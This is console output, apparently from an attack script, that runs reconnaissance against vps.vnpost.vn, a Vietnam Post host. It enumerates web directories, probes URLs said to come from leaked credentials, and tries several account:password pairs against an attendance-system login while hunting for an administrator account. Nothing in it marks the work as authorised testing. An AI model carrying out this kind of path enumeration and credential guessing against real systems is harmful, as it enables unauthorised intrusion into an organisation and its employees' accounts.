━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔍 认真侦察 - 找到真实可访问的系统
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[1] 枚举所有可访问的Web应用
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  /chamcong/: ✅ 200 (可访问)
      标题: 
  /vckv/: ✅ 200 (可访问)
      标题: 
  /luong/: ❌ 404
  /cos/: ❌ 404
  /admin/: ❌ 404
  /manage/: ❌ 404
  /portal/: ❌ 404
  /webmail/: ❌ 404
  /api/: ❌ 500

[2] 测试泄露凭证的精确URL
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  A. http://vps.vnpost.vn/cos/SCRIPT/6_QUANTRI/change_password.asp
    状态: 404
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>

  B. http://vps.vnpost.vn/cos/Login.asp
    状态: 404

[3] 从根目录爬取所有应用
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  获取首页...

  发现的目录:

[4] 测试Chamcong其他账号（寻找管理员）
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

  测试: KVMBTCKT:123
    ❌ 登录失败

  测试: KVMTBDVP:123
    ❌ 登录失败

  测试: KVMTNVKS:123
    ❌ 登录失败

  测试: KVMTVCGN:234
    ❌ 登录失败

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ 认真侦察完成
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
